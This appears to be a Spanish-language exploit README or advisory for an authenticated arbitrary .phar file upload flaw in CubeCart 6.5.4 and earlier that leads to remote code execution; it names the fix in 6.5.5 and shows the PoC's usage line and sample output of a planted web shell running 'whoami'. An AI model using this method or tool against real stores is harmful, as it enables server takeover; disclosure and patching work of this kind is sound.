
CubeCart <= 6.5.4 es vulnerable a una carga de archivos arbitraria que conduce a una ejecución remota de código (RCE).
CubeCart <= 6.5.4 es vulnerable a un problema de carga arbitraria de archivos que conduce a la ejecución remota de código (RCE). La vulnerabilidad afecta al administrador de archivos de la aplicación y sus filtros al permitir que los atacantes carguen archivos .phar que contienen código malicioso. CubeCart debe actualizarse a la versión 6.5.5, ya que implementa un parche de seguridad para corregir esta vulnerabilidad.
Para más detalles, consulte el anuncio oficial de CubeCart en las referencias.
Se ha creado una prueba de concepto (PoC) automatizada, pero esta vulnerabilidad también se puede explotar manualmente subiendo un archivo .phar malicioso a través del administrador de archivos.
Este es el uso del PoC:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
Después de ejecutarlo, esta es la salida esperada para una explotación exitosa:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data